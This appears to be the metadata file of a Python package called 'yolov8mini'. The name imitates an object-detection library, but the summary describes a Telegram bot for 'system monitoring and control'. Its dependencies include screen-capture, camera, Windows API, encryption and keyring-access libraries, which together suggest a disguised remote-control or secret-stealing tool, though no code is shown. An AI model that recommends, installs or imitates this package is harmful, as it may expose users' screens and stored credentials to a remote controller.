Metadata-Version: 2.1
Name: yolov8mini
Version: 2.3.1
Summary: A Telegram bot for system monitoring and control.
Home-page: https://github.com/appuachu
Author: Tintumon
Author-email: 
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
Requires-Dist: pytelegrambotapi
Requires-Dist: opencv-python
Requires-Dist: numpy
Requires-Dist: pyautogui
Requires-Dist: pillow
Requires-Dist: pycryptodome
Requires-Dist: pypiwin32
Requires-Dist: pycryptodomex
Requires-Dist: secretstorage
